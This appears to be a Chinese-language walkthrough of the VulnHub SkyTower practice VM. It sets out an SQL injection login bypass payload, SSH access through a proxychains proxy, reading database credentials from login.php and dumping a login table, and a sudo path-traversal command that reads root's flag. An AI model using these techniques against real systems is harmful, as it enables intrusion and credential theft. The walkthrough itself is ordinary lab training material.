一、靶机配置
1、靶机下载地址
https://www.vulnhub.com/entry/skytower-1,96/2、下载下来是个SkyTower.vbox文件
3、需要下载VirtualBox进行编译
https://www.virtualbox.org/wiki/Downloads
这是官网地址4、安装完毕后,点击注册
将下载的SkyTower.vbox文件导入进去
5、点击管理——>导出虚拟电脑
就会出来一个SkyTower.ova文件
6、然后用vmware打开
二、Web渗透测试
1、导入虚拟机,将网卡设置为net
2、利用nmap扫描同一网段
nmap 192.168.31.0/24 
得到靶机IP地址
3、扫描端口和服务版本
得到80和22端口开发
4、访问靶机主页
是个登录框,可以尝试sql注入
邮箱:随便一个都行
密码输入
1111'|| 1=1 #
成功登录,并且得到了默认的账户密码
5、尝试SSH远程连接
ssh john@192.168.31.137
发现连接不上
之前扫描端口发现还开放了一个3128端口,有可能是改过的端口,尝试挂代理
6、挂取3128代理
vim /etc/proxychains4.conf
6、尝试挂取代理连接
proxychains ssh john@192.168.31.137 -t "/bin/sh"
成功连接
三、提权
1、查看sudo用户文件
sudo -l
权限不够,之前login.php存在sql注入,查看一下文件
cat /war/www/login.php
发现数据库信息
2、尝试连接mysql
mysql -u root SkyTech -p
连接成功
3、查看数据库信息
show databases;
进入SkyTech库,查看库中的数据
use SkyTech;
show tables;
查找login表中的所有数据
select * from login;
远程连接sara用户
sudo -l 查看权限
发现accounts有权限,并在根目录下
已知accounts/有权限,查看root目录,发现有个flag.txt文件
sudo cat /accounts/../root/flag.txt
得到root用户的密码
4、重新连接root用户
成功提权!!!
448
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
